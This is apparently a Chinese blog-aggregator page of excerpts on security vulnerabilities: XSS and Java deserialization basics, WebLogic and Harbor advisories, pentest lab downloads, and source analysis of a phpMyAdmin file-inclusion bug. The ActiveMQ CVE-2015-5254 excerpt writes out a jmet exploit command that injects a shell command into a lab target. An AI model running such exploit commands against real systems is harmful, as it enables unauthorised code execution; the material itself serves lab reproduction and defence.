漏洞

ActiveMQ反序列化漏洞(CVE-2015-5254)复现

筅森魡賤 提交于 2019-12-11 10:26:06
简介: Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 1.首先在kali里面执行以下命令: cd var/opt wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar mkdir external 2.输入: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120 61616 注释:-Q指定队列消息名,-I指定JMS客户端,这里是ActiveMQ,-Y指定具体的命令,-Yp指定payload类型,其后分别是ActiveMQ所在机器的ip及工作端口 3.现在会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.199.120:8161/admin

XSS漏洞基础

拜拜、爱过 提交于 2019-12-11 10:20:55
XSS漏洞基础知识详解和DVWA的XSS练习 目录 xxs漏洞基础知识详解 XSS漏洞原理 1.反射型XSS 2.存储型XSS 3.DOM型XSS 跨站脚本(Cross-Site Scripting, 简称为xss或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入页面, 其他用户在游览网页时就会受到影响。恶意用户利用XSS代码攻击成功后, 可能曾到很高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 最简单的XSS攻击分为三种:反射型、 存储型、 DOM型 XSS漏洞原理 1.反射型XSS 反射型XSS又称非持久型XSS, 这种攻击方式往往具有一次性。 攻击方式:攻击者通过电子邮件等方式将包含XSS代码的恶意链接发送给目标用户。当目标用户访问该链接时,服务器接受该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的游览器,游览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。 2.存储型XSS 存储型XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐藏性。 攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中。随着帖子被服务器存储下来,恶意脚本也永久地被存放在服务器的后端存储器中

Java反序列化漏洞

拟墨画扇 提交于 2019-12-11 08:30:18
一、Java 序列化与反序列化 Java 序列化是指把 Java 对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。 Java 反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类的 readObject() 方法用于反序列化。 序列化与反序列化是让 Java 对象脱离 Java 运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。主要应用在以下场景: HTTP: 多平台之间的通信,管理等 RMI:是 Java 的一组拥护开发分布式应用程序的 API,实现了不同操作系统之间程序的方法调用。值得注意的是,RMI 的传输 100% 基于反序列化,Java RMI 的默认端口是 1099 端口。 JMX: JMX 是一套标准的代理和服务,用户可以在任何 Java 应用程序中使用这些代理和服务实现管理,中间件软件 WebLogic 的管理页面就是基于 JMX 开发的,而 JBoss 则整个系统都基于 JMX 构架。 ​ 2016年Spring RMI反序列化漏洞今年比较出名的:Jackson,FastJson Java 十分受开发者喜爱的一点是其拥有完善的第三方类库,和满足各种需求的框架;但正因为很多第三方类库引用广泛

针对需要使用T3协议的Weblogic2628漏洞解决方案

老子叫甜甜 提交于 2019-12-11 02:13:33
针对需要使用T3协议的Weblogic2628漏洞解决方案 前几天用户的服务器中检查到了Weblogic2628l漏洞,并且打过Oracle官方补丁后还是能检测到。 针对此问题,去网上查找了一些资料。做了一些总结和测试,一共有四种解决此漏洞的方法: 1、禁止使用Weblogic的T3协议。(客户需要使用此协议,不可取); 2、升级Oracle官方4月份补丁。(经过测试,打过补丁后,此漏洞依然存在); 3、使用绿盟NIPS,规则库能够阻挡外部攻击。 4、设置T3协议白名单。(对需要使用T3协议的情况下很好使,下面会给出步骤) 测试环境:weblogic10.3.6服务器(windows 2008R2)192.168.125.118 攻击机win10 192.168.125.117 使用脚本本地检测,存在web logic2628漏洞(脚本链接:https://github.com/aedoo/CVE-2018-2628-MultiThreading) 同一内网下的win10 检测,同样存在此漏洞 设置T3协议白名单 (1)进入Weblogic控制台,在base_domain的配置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中 输入:ip

应用安全 - harbaor - 漏洞汇总

送分小仙女□ 提交于 2019-12-10 13:53:14
CVE-2019-19026(SQL注入,高危): https://github.com/goharbor/harbor/security/advisories/GHSA-rh89-vvrg-fg64 (需管理权限) CVE-2019-19029(SQL注入,高危): https://github.com/goharbor/harbor/security/advisories/GHSA-qcfv-8v29-469w (需管理权限) CVE-2019-19025(CSRF保护缺失,严重): https://github.com/goharbor/harbor/security/advisories/GHSA-gcqm-v682-ccw6 (需诱导授权) CVE-2019-19023(权限提升,严重): https://github.com/goharbor/harbor/security/advisories/GHSA-3868-7c5x-4827 (需权限) CVE-2019-3990(用户枚举,中危): https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg (需普通用户权限) 来源: https://www.cnblogs.com/AtesetEnginner/p/12016121

针对网站漏洞怎么修复区块链漏洞之以太坊

独自空忆成欢 提交于 2019-12-10 08:28:52
前段时间以太坊升级架构,君士坦丁堡的硬分叉一个升级代号,被爆出含有高危的网站漏洞,该漏洞产生的原因是由于开启了新的协议模式eip1283导致的,也是区块链漏洞当中危害较为严重的,可以让一些交易进行重入,一个转账可以导致写入2次,但该漏洞并不是确实的可以进行重入漏洞。以太坊区块链在发现该漏洞之后,紧急的停止了以太坊的硬分叉升级,并与上个星期五召开了内部会议对其漏洞进行修复,延期对以太坊的硬分叉升级。 区块链当中,以太坊属于比较大的虚拟币,位列于比特币,第二。关于该漏洞的详情我们来分析一下,关于这次以太坊的升级大家都可以提议,必须经过内部审核,才会通过提议,在这次的提议当中有个eip1283的升级建议, 以太坊的漏洞就是由他而生。 这个建议主要是对以太坊的操作码进行长久的保存数据以及更好的整理以太坊的交易手续费,便捷,快速,处理过程的逻辑更为人性化,大大节省了成本以及时间,使得该提议被提上了日程,以太坊也进行了采纳,公开与众,攻击者根据公开的一些细节,对其进行漏洞挖掘,才导致了今天发生以太坊漏洞。 区块链重入漏洞在同一个交易当中,1个买家1个卖家进行的合约交易,两种合约互相调用并产生了重复转账的一个漏洞,漏洞产生的根源并没有将转账当成一个事务处理来看待。我们来看一下下图: 我们模拟了一个合约,交易的虚拟币由deposits来存储,然后再推送到splits变量当中去分配这个存储比例

TOP10漏洞之文件包含

爷,独闯天下 提交于 2019-12-10 06:40:32
前沿 很早之前就学习了top10的漏洞,但是对于我自己来说基本上就大体的过来一遍,有一句话就是 学习好基础,让你少奋斗两年 , 于是我现在又来过一遍top10漏洞。在这些中主要侧重于我自己的思路。 ##文件包含含义: 文件包含在我的理解来说就是程序员在自己写代码是要调用其他的文件,使用包含文件的函数。在我们耳中关于文件包含漏洞的存在基本在 php ,但是在 jsp , asp 中同样也存在文件包含。 于是在这篇文章中,我们学习这三种类型的文件包含漏洞。 php 在php中文件包含分为远程文件包含(LFI)本地文件包含(RFI) LFI 本地文件包含漏洞,顾名思义就是包含本地的文件,当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。现实中多遇到的文件包含为本地文件包含。 RFI 远程文件包含漏洞,顾名思义就是包含远程服务器上的文件。 需要在php.ini上开启 all_url_fopen=on && all_url_include=on 。 在php中, all_url_fopen 默认为on, all_url_include 在php版本5.2后,就默认为off.若需要使用远程文件包含,就要想办法开启 all_url_include 。 php文件包含的函数: include(),include_once(),require(),require_once(),file_get

改进身份验证漏洞扫描的五个步骤

被刻印的时光 ゝ 提交于 2019-12-10 03:43:47
你无法保护你不知道的东西。虽然这并不是IT安全领域的咒语,但当你从“可信”用户的角度寻找安全漏洞,或者换句话说,通过身份验证执行漏洞扫描时,这个原则确实是真的。 通过配置漏洞扫描仪来登录到你正在测试的主机,你会看到这个故事的其余部分——即为了节省时间或金钱,或者因为复杂性而经常被忽略的安全方面。事实的真相是,尽管执行身份验证扫描确实需要更多的时间,但从发现的漏洞(以及最终缓解的风险)来看,这种漏洞扫描比通过非身份验证扫描的效果好十倍。 安全团队可以遵循下面五种方法来更有效地准备和执行身份验证漏洞扫描,以及充分利用其得到的结果: 1. 事先知道需要通过身份验证进行扫描的系统 这可能包括所有Windows和基于Linux的系统,或者少数计算机部分(例如服务器或工作组)。此外,请务必考虑扫描Web应用、数据库以及允许或要求通过Telnet、FTP、SSH和SNMP等协议的身份验证的所有网络主机。很多商业漏洞扫描仪(例如Nexpose和LanGuard)提供了各种方法来进行扫描。如果你网络外部的黑客或者内部的恶意用户都开始使用身份验证扫描,那么你也需要这样做。 2. 确定想要扫描何种用户角色水平 笔者建议至少使用管理员或根级登录凭证进行扫描;这样你将会发现大部分漏洞。然而,通过不同用户角色进行扫描(例如经理级别角色或基本用户角色),你可以更好地了解每个用户组可以看到和利用的资源

渗透测试靶机下载

风格不统一 提交于 2019-12-10 00:56:30
Vulnhub https://www.vulnhub.com prime靶机 https://www.vulnhub.com/entry/prime-1,358/ PentesterLab PentesterLab提供易受攻击的系统,可用于测试和了解漏洞。 我主要用的是两个web渗透测试演练系统:Web Pentester和Web PentesterII。 Web Pentester 下载: https://pentesterlab.com/exercises/web_for_pentester/iso Web Pentester II 下载: https://pentesterlab.com/exercises/web_for_pentester_II/iso 注意:PentesterLab提供的渗透测试演练系统有很多,不仅仅只有以下两种,以上两种只是web渗透测试而已 Metasploitable Metasploitable虚拟机是Ubuntu Linux的故意易受攻击版本,旨在测试安全工具并演示常见漏洞。此 可虚拟机可用于执行安全培训,测试安全工具以及实践常见的渗透测试技术。 Metasploitable还包括非常著名的的 DVWA 、 mutillidae 。 DVWA (Dam Vulnerable Web Application)是用PHP

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

半世苍凉 提交于 2019-12-09 23:36:03
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 参考文章1 参考文章2 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。 影响:phpMyAdmin-4.8.0/4.8.1 漏洞环境 phpStudy2016 下载 phpMyAdmin-4.8.1 下载 漏洞成因 漏洞索引: 文件路径: .\phpMyAdmin\index.php 位置锁定:line 55~63 源码分析: // 如果有一个有效的目标,加载这个脚本 if (! empty($_REQUEST['target']) //是否存在target参数 && is_string($_REQUEST['target']) //target是否为字符串 && ! preg_match('/^index/', $_REQUEST[